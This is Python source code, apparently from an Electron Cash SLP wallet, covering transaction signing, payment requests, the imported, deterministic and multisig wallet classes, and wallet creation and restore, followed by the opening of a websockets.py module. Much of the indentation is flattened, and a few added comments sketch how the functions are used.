if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
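    # Hedged usage sketch (illustrative only): the sighash cache is only safe
    # as long as the non-signature parts of the transaction stay unchanged
    # between signing passes, e.g. when collecting cosigner signatures for the
    # same multisig transaction.
    #
    #   wallet.sign_transaction(tx, password, use_cache=True)
    #   # ... gather more signatures for the *same* tx, then sign again:
    #   wallet.sign_transaction(tx, password, use_cache=True)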
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
out['URI'] = '{}:{}?amount={}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
                if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
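    # Hedged usage sketch (illustrative only): a request dict is first built
    # with make_payment_request() and then registered (and optionally written
    # out to the bip70 requests_dir) via add_payment_request(); its state can
    # later be polled with get_request_status(). `addr` and `config` assumed.
    #
    #   req = wallet.make_payment_request(addr, 100000, "invoice #1", expiration=3600)
    #   wallet.add_payment_request(req, config)
    #   status, conf = wallet.get_request_status(addr)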
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
            # See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
        wants to resync the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
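    # Hedged usage sketch (illustrative only): Schnorr signing is a per-wallet
    # setting and only takes effect when is_schnorr_possible() returns True
    # (i.e. not a multisig or hardware wallet).
    #
    #   if wallet.is_schnorr_possible():
    #       wallet.set_schnorr_enabled(True)
    #   wallet.is_schnorr_enabled()   # True only if both possible and enabled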
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
# Convert 'bip39-slp' wallet type to 'slp_standard' wallet type
if storage.get('wallet_type', '') == 'bip39-slp' or storage.get('wallet_type', '') == 'standard_slp':
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
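# Hedged usage sketch (illustrative only): the Wallet factory dispatches on the
# stored 'wallet_type'; `path` is a hypothetical wallet file path.
#
#   storage = WalletStorage(path)
#   wallet = Wallet(storage)   # e.g. a Standard_Wallet or Multisig_Wallet instance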
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
    elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
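# Hedged usage sketch (illustrative only): `text` may be a seed phrase, a master
# key, or a whitespace-separated list of addresses or WIF private keys, and the
# wallet type is chosen accordingly. `seed_phrase`, `path`, `config` and `pw`
# are hypothetical here.
#
#   d = restore_wallet_from_text(seed_phrase, path=path, config=config, password=pw)
#   wallet = d['wallet']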
|
websockets.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
request_queue = queue.Queue()
class ElectrumWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
